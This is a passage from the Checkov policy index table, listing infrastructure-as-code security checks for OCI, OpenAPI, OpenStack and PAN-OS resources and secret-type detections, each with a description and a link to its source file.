[InstanceBootVolumeIntransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceBootVolumeIntransitEncryption.py) | -| 3532 | CKV_OCI_5 | resource | oci_core_instance | Ensure OCI Compute Instance has Legacy MetaData service endpoint disabled | Terraform | [InstanceMetadataServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceMetadataServiceEnabled.py) | -| 3533 | CKV_OCI_6 | resource | oci_core_instance | Ensure OCI Compute Instance has monitoring enabled | Terraform | [InstanceMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceMonitoringEnabled.py) | -| 3534 | CKV_OCI_7 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage bucket can emit object events | Terraform | [ObjectStorageEmitEvents.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageEmitEvents.py) | -| 3535 | CKV_OCI_8 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage has versioning enabled | Terraform | [ObjectStorageVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageVersioning.py) | -| 3536 | CKV_OCI_9 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage is encrypted with Customer Managed Key | Terraform | [ObjectStorageEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageEncryption.py) | -| 3537 | CKV_OCI_10 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage is not Public | Terraform | [ObjectStoragePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStoragePublic.py) | -| 3538 | CKV_OCI_11 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain lower case | Terraform | 
[IAMPasswordPolicyLowerCase.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyLowerCase.py) | -| 3539 | CKV_OCI_12 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Numeric characters | Terraform | [IAMPasswordPolicyNumeric.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyNumeric.py) | -| 3540 | CKV_OCI_13 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Special characters | Terraform | [IAMPasswordPolicySpecialCharacters.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicySpecialCharacters.py) | -| 3541 | CKV_OCI_14 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Uppercase characters | Terraform | [IAMPasswordPolicyUpperCase.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyUpperCase.py) | -| 3542 | CKV_OCI_15 | resource | oci_file_storage_file_system | Ensure OCI File System is Encrypted with a customer Managed Key | Terraform | [FileSystemEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/FileSystemEncryption.py) | -| 3543 | CKV_OCI_16 | resource | oci_core_security_list | Ensure VCN has an inbound security list | Terraform | [SecurityListIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListIngress.py) | -| 3544 | CKV_OCI_17 | resource | oci_core_security_list | Ensure VCN inbound security lists are stateless | Terraform | [SecurityListIngressStateless.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListIngressStateless.py) | -| 3545 | CKV_OCI_18 | resource | oci_identity_authentication_policy | OCI IAM password policy for local (non-federated) users has 
a minimum length of 14 characters | Terraform | [IAMPasswordLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordLength.py) | -| 3546 | CKV_OCI_19 | resource | oci_core_security_list | Ensure no security list allow ingress from 0.0.0.0:0 to port 22. | Terraform | [SecurityListUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress22.py) | -| 3547 | CKV_OCI_20 | resource | oci_core_security_list | Ensure no security list allow ingress from 0.0.0.0:0 to port 3389. | Terraform | [SecurityListUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress3389.py) | -| 3548 | CKV_OCI_21 | resource | oci_core_network_security_group_security_rule | Ensure security group has stateless ingress security rules | Terraform | [SecurityGroupsIngressStatelessSecurityRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityGroupsIngressStatelessSecurityRules.py) | -| 3549 | CKV_OCI_22 | resource | oci_core_network_security_group_security_rule | Ensure no security groups rules allow ingress from 0.0.0.0/0 to port 22 | Terraform | [AbsSecurityGroupUnrestrictedIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/AbsSecurityGroupUnrestrictedIngress.py) | -| 3550 | CKV2_OCI_1 | resource | oci_identity_group | Ensure administrator users are not associated with API keys | Terraform | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) | -| 3551 | CKV2_OCI_1 | resource | oci_identity_user | Ensure administrator users are not associated with API keys | Terraform | 
[AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) | -| 3552 | CKV2_OCI_1 | resource | oci_identity_user_group_membership | Ensure administrator users are not associated with API keys | Terraform | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) | -| 3553 | CKV2_OCI_2 | resource | oci_core_network_security_group_security_rule | Ensure NSG does not allow all traffic on RDP port (3389) | Terraform | [OCI_NSGNotAllowRDP.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_NSGNotAllowRDP.yaml) | -| 3554 | CKV2_OCI_3 | resource | oci_containerengine_cluster | Ensure Kubernetes engine cluster is configured with NSG(s) | Terraform | [OCI_KubernetesEngineClusterEndpointConfigWithNSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_KubernetesEngineClusterEndpointConfigWithNSG.yaml) | -| 3555 | CKV2_OCI_4 | resource | oci_file_storage_export | Ensure File Storage File System access is restricted to root users | Terraform | [OCI_NFSaccessRestrictedToRootUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_NFSaccessRestrictedToRootUsers.yaml) | -| 3556 | CKV2_OCI_5 | resource | oci_containerengine_node_pool | Ensure Kubernetes Engine Cluster boot volume is configured with in-transit data encryption | Terraform | [OCI_K8EngineClusterBootVolConfigInTransitEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_K8EngineClusterBootVolConfigInTransitEncryption.yaml) | -| 3557 | CKV2_OCI_6 | resource | oci_containerengine_cluster | Ensure Kubernetes Engine Cluster pod security policy is enforced | 
Terraform | [OCI_K8EngineClusterPodSecPolicyEnforced.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_K8EngineClusterPodSecPolicyEnforced.yaml) | -| 3558 | CKV_OPENAPI_1 | resource | securityDefinitions | Ensure that securityDefinitions is defined and not empty - version 2.0 files | OpenAPI | [SecurityDefinitions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/SecurityDefinitions.py) | -| 3559 | CKV_OPENAPI_2 | resource | security | Ensure that if the security scheme is not of type 'oauth2', the array value must be empty - version 2.0 files | OpenAPI | [Oauth2SecurityRequirement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2SecurityRequirement.py) | -| 3560 | CKV_OPENAPI_3 | resource | components | Ensure that security schemes don't allow cleartext credentials over unencrypted channel - version 3.x.y files | OpenAPI | [CleartextOverUnencryptedChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v3/CleartextOverUnencryptedChannel.py) | -| 3561 | CKV_OPENAPI_4 | resource | security | Ensure that the global security field has rules defined | OpenAPI | [GlobalSecurityFieldIsEmpty.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/generic/GlobalSecurityFieldIsEmpty.py) | -| 3562 | CKV_OPENAPI_5 | resource | security | Ensure that security operations is not empty. 
| OpenAPI | [SecurityOperations.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/generic/SecurityOperations.py) | -| 3563 | CKV_OPENAPI_6 | resource | security | Ensure that security requirement defined in securityDefinitions - version 2.0 files | OpenAPI | [SecurityRequirement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/SecurityRequirement.py) | -| 3564 | CKV_OPENAPI_7 | resource | security | Ensure that the path scheme does not support unencrypted HTTP connection where all transmissions are open to interception- version 2.0 files | OpenAPI | [PathSchemeDefineHTTP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/PathSchemeDefineHTTP.py) | -| 3565 | CKV_OPENAPI_8 | resource | security | Ensure that security is not using 'password' flow in OAuth2 authentication - version 2.0 files | OpenAPI | [Oauth2SecurityPasswordFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2SecurityPasswordFlow.py) | -| 3566 | CKV_OPENAPI_9 | resource | paths | Ensure that security scopes of operations are defined in securityDefinitions - version 2.0 files | OpenAPI | [OperationObjectSecurityScopeUndefined.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectSecurityScopeUndefined.py) | -| 3567 | CKV_OPENAPI_10 | resource | paths | Ensure that operation object does not use 'password' flow in OAuth2 authentication - version 2.0 files | OpenAPI | [Oauth2OperationObjectPasswordFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2OperationObjectPasswordFlow.py) | -| 3568 | CKV_OPENAPI_11 | resource | securityDefinitions | Ensure that operation object does not use 'password' flow in OAuth2 authentication - version 2.0 files | OpenAPI | 
[Oauth2SecurityDefinitionPasswordFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2SecurityDefinitionPasswordFlow.py) | -| 3569 | CKV_OPENAPI_12 | resource | securityDefinitions | Ensure no security definition is using implicit flow on OAuth2, which is deprecated - version 2.0 files | OpenAPI | [Oauth2SecurityDefinitionImplicitFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2SecurityDefinitionImplicitFlow.py) | -| 3570 | CKV_OPENAPI_13 | resource | securityDefinitions | Ensure security definitions do not use basic auth - version 2.0 files | OpenAPI | [SecurityDefinitionBasicAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/SecurityDefinitionBasicAuth.py) | -| 3571 | CKV_OPENAPI_14 | resource | paths | Ensure that operation objects do not use 'implicit' flow, which is deprecated - version 2.0 files | OpenAPI | [OperationObjectImplicitFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectImplicitFlow.py) | -| 3572 | CKV_OPENAPI_15 | resource | paths | Ensure that operation objects do not use basic auth - version 2.0 files | OpenAPI | [OperationObjectBasicAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectBasicAuth.py) | -| 3573 | CKV_OPENAPI_16 | resource | paths | Ensure that operation objects have 'produces' field defined for GET operations - version 2.0 files | OpenAPI | [OperationObjectProducesUndefined.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectProducesUndefined.py) | -| 3574 | CKV_OPENAPI_17 | resource | paths | Ensure that operation objects have 'consumes' field defined for PUT, POST and PATCH operations - version 2.0 files | OpenAPI | 
[OperationObjectConsumesUndefined.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectConsumesUndefined.py) | -| 3575 | CKV_OPENAPI_18 | resource | schemes | Ensure that global schemes use 'https' protocol instead of 'http'- version 2.0 files | OpenAPI | [GlobalSchemeDefineHTTP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/GlobalSchemeDefineHTTP.py) | -| 3576 | CKV_OPENAPI_19 | resource | security | Ensure that global security scope is defined in securityDefinitions - version 2.0 files | OpenAPI | [GlobalSecurityScopeUndefined.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/GlobalSecurityScopeUndefined.py) | -| 3577 | CKV_OPENAPI_20 | resource | paths | Ensure that API keys are not sent over cleartext | OpenAPI | [ClearTextAPIKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/generic/ClearTextAPIKey.py) | -| 3578 | CKV_OPENAPI_21 | resource | paths | Ensure that arrays have a maximum number of items | OpenAPI | [NoMaximumNumberItems.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/generic/NoMaximumNumberItems.py) | -| 3579 | CKV_OPENSTACK_1 | provider | openstack | Ensure no hard coded OpenStack password, token, or application_credential_secret exists in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/openstack/credentials.py) | -| 3580 | CKV_OPENSTACK_2 | resource | openstack_compute_secgroup_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress22.py) | -| 3581 | CKV_OPENSTACK_2 | resource | openstack_networking_secgroup_rule_v2 | Ensure no security groups allow ingress from 
0.0.0.0:0 to port 22 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress22.py) | -| 3582 | CKV_OPENSTACK_3 | resource | openstack_compute_secgroup_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py) | -| 3583 | CKV_OPENSTACK_3 | resource | openstack_networking_secgroup_rule_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py) | -| 3584 | CKV_OPENSTACK_4 | resource | openstack_compute_instance_v2 | Ensure that instance does not use basic credentials | Terraform | [ComputeInstanceAdminPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/ComputeInstanceAdminPassword.py) | -| 3585 | CKV_OPENSTACK_5 | resource | openstack_fw_rule_v1 | Ensure firewall rule set a destination IP | Terraform | [FirewallRuleSetDestinationIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/FirewallRuleSetDestinationIP.py) | -| 3586 | CKV_PAN_1 | provider | panos | Ensure no hard coded PAN-OS credentials exist in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/panos/credentials.py) | -| 3587 | CKV_PAN_2 | resource | panos_management_profile | Ensure plain-text management HTTP is not enabled for an Interface Management Profile | Terraform | 
[InterfaceMgmtProfileNoHTTP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/InterfaceMgmtProfileNoHTTP.py) | -| 3588 | CKV_PAN_2 | resource | tasks.paloaltonetworks.panos.panos_management_profile | Ensure plain-text management HTTP is not enabled for an Interface Management Profile | Ansible | [PanosInterfaceMgmtProfileNoHTTP.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosInterfaceMgmtProfileNoHTTP.yaml) | -| 3589 | CKV_PAN_3 | resource | panos_management_profile | Ensure plain-text management Telnet is not enabled for an Interface Management Profile | Terraform | [InterfaceMgmtProfileNoTelnet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/InterfaceMgmtProfileNoTelnet.py) | -| 3590 | CKV_PAN_3 | resource | tasks.paloaltonetworks.panos.panos_management_profile | Ensure plain-text management Telnet is not enabled for an Interface Management Profile | Ansible | [PanosInterfaceMgmtProfileNoTelnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosInterfaceMgmtProfileNoTelnet.yaml) | -| 3591 | CKV_PAN_4 | resource | panos_security_policy | Ensure DSRI is not enabled within security policies | Terraform | [PolicyNoDSRI.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoDSRI.py) | -| 3592 | CKV_PAN_4 | resource | panos_security_rule_group | Ensure DSRI is not enabled within security policies | Terraform | [PolicyNoDSRI.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoDSRI.py) | -| 3593 | CKV_PAN_4 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure DSRI is not enabled within security policies | Ansible | [PanosPolicyNoDSRI.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoDSRI.yaml) | -| 3594 | CKV_PAN_5 | 
resource | panos_security_policy | Ensure security rules do not have 'applications' set to 'any' | Terraform | [PolicyNoApplicationAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoApplicationAny.py) | -| 3595 | CKV_PAN_5 | resource | panos_security_rule_group | Ensure security rules do not have 'applications' set to 'any' | Terraform | [PolicyNoApplicationAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoApplicationAny.py) | -| 3596 | CKV_PAN_5 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure security rules do not have 'application' set to 'any' | Ansible | [PanosPolicyNoApplicationAny.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoApplicationAny.yaml) | -| 3597 | CKV_PAN_6 | resource | panos_security_policy | Ensure security rules do not have 'services' set to 'any' | Terraform | [PolicyNoServiceAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoServiceAny.py) | -| 3598 | CKV_PAN_6 | resource | panos_security_rule_group | Ensure security rules do not have 'services' set to 'any' | Terraform | [PolicyNoServiceAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoServiceAny.py) | -| 3599 | CKV_PAN_6 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure security rules do not have 'service' set to 'any' | Ansible | [PanosPolicyNoServiceAny.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoServiceAny.yaml) | -| 3600 | CKV_PAN_7 | resource | panos_security_policy | Ensure security rules do not have 'source_addresses' and 'destination_addresses' both containing values of 'any' | Terraform | 
[PolicyNoSrcAnyDstAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoSrcAnyDstAny.py) | -| 3601 | CKV_PAN_7 | resource | panos_security_rule_group | Ensure security rules do not have 'source_addresses' and 'destination_addresses' both containing values of 'any' | Terraform | [PolicyNoSrcAnyDstAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoSrcAnyDstAny.py) | -| 3602 | CKV_PAN_7 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure security rules do not have 'source_ip' and 'destination_ip' both containing values of 'any' | Ansible | [PanosPolicyNoSrcAnyDstAny.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoSrcAnyDstAny.yaml) | -| 3603 | CKV_PAN_8 | resource | panos_security_policy | Ensure description is populated within security policies | Terraform | [PolicyDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyDescription.py) | -| 3604 | CKV_PAN_8 | resource | panos_security_rule_group | Ensure description is populated within security policies | Terraform | [PolicyDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyDescription.py) | -| 3605 | CKV_PAN_8 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure description is populated within security policies | Ansible | [PanosPolicyDescription.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyDescription.yaml) | -| 3606 | CKV_PAN_9 | resource | panos_security_policy | Ensure a Log Forwarding Profile is selected for each security policy rule | Terraform | [PolicyLogForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLogForwarding.py) | -| 3607 | CKV_PAN_9 | resource | 
panos_security_rule_group | Ensure a Log Forwarding Profile is selected for each security policy rule | Terraform | [PolicyLogForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLogForwarding.py) | -| 3608 | CKV_PAN_9 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure a Log Forwarding Profile is selected for each security policy rule | Ansible | [PanosPolicyLogForwarding.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyLogForwarding.yaml) | -| 3609 | CKV_PAN_10 | resource | panos_security_policy | Ensure logging at session end is enabled within security policies | Terraform | [PolicyLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLoggingEnabled.py) | -| 3610 | CKV_PAN_10 | resource | panos_security_rule_group | Ensure logging at session end is enabled within security policies | Terraform | [PolicyLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLoggingEnabled.py) | -| 3611 | CKV_PAN_10 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure logging at session end is enabled within security policies | Ansible | [PanosPolicyLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyLoggingEnabled.yaml) | -| 3612 | CKV_PAN_11 | resource | panos_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure encryption algorithms | Terraform | [NetworkIPsecAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAlgorithms.py) | -| 3613 | CKV_PAN_11 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure encryption algorithms | Terraform | 
[NetworkIPsecAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAlgorithms.py) | -| 3614 | CKV_PAN_12 | resource | panos_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure authentication algorithms | Terraform | [NetworkIPsecAuthAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAuthAlgorithms.py) | -| 3615 | CKV_PAN_12 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure authentication algorithms | Terraform | [NetworkIPsecAuthAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAuthAlgorithms.py) | -| 3616 | CKV_PAN_12 | resource | tasks.paloaltonetworks.panos.panos_ipsec_profile | Ensure IPsec profiles do not specify use of insecure authentication algorithms | Ansible | [PanosIPsecAuthenticationAlgorithms.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosIPsecAuthenticationAlgorithms.yaml) | -| 3617 | CKV_PAN_13 | resource | panos_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure protocols | Terraform | [NetworkIPsecProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecProtocols.py) | -| 3618 | CKV_PAN_13 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure protocols | Terraform | [NetworkIPsecProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecProtocols.py) | -| 3619 | CKV_PAN_13 | resource | tasks.paloaltonetworks.panos.panos_ipsec_profile | Ensure IPsec profiles do not specify use of insecure protocols | Ansible | 
[PanosIPsecProtocols.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosIPsecProtocols.yaml) | -| 3620 | CKV_PAN_14 | resource | panos_panorama_zone | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | -| 3621 | CKV_PAN_14 | resource | panos_zone | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | -| 3622 | CKV_PAN_14 | resource | panos_zone_entry | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | -| 3623 | CKV_PAN_14 | resource | tasks.paloaltonetworks.panos.panos_zone | Ensure a Zone Protection Profile is defined within Security Zones | Ansible | [PanosZoneProtectionProfile.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosZoneProtectionProfile.yaml) | -| 3624 | CKV_PAN_15 | resource | panos_panorama_zone | Ensure an Include ACL is defined for a Zone when User-ID is enabled | Terraform | [ZoneUserIDIncludeACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneUserIDIncludeACL.py) | -| 3625 | CKV_PAN_15 | resource | panos_zone | Ensure an Include ACL is defined for a Zone when User-ID is enabled | Terraform | [ZoneUserIDIncludeACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneUserIDIncludeACL.py) | -| 3626 | CKV_PAN_15 | resource | tasks.paloaltonetworks.panos.panos_zone | Ensure an Include ACL is defined for a Zone when User-ID is enabled | Ansible | 
[PanosZoneUserIDIncludeACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosZoneUserIDIncludeACL.yaml) | -| 3627 | CKV_PAN_16 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure logging at session start is disabled within security policies except for troubleshooting and long lived GRE tunnels | Ansible | [PanosPolicyLogSessionStart.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyLogSessionStart.yaml) | -| 3628 | CKV_PAN_17 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure security rules do not have 'source_zone' and 'destination_zone' both containing values of 'any' | Ansible | [PanosPolicyNoSrcZoneAnyNoDstZoneAny.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoSrcZoneAnyNoDstZoneAny.yaml) | -| 3629 | CKV_SECRET_1 | Artifactory Credentials | secrets | Artifactory Credentials | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3630 | CKV_SECRET_2 | AWS Access Key | secrets | AWS Access Key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3631 | CKV_SECRET_3 | Azure Storage Account access key | secrets | Azure Storage Account access key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3632 | CKV_SECRET_4 | Basic Auth Credentials | secrets | Basic Auth Credentials | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3633 | 
CKV_SECRET_5 | Cloudant Credentials | secrets | Cloudant Credentials | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3634 | CKV_SECRET_6 | Base64 High Entropy String | secrets | Base64 High Entropy String | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3635 | CKV_SECRET_7 | IBM Cloud IAM Key | secrets | IBM Cloud IAM Key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3636 | CKV_SECRET_8 | IBM COS HMAC Credentials | secrets | IBM COS HMAC Credentials | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3637 | CKV_SECRET_9 | JSON Web 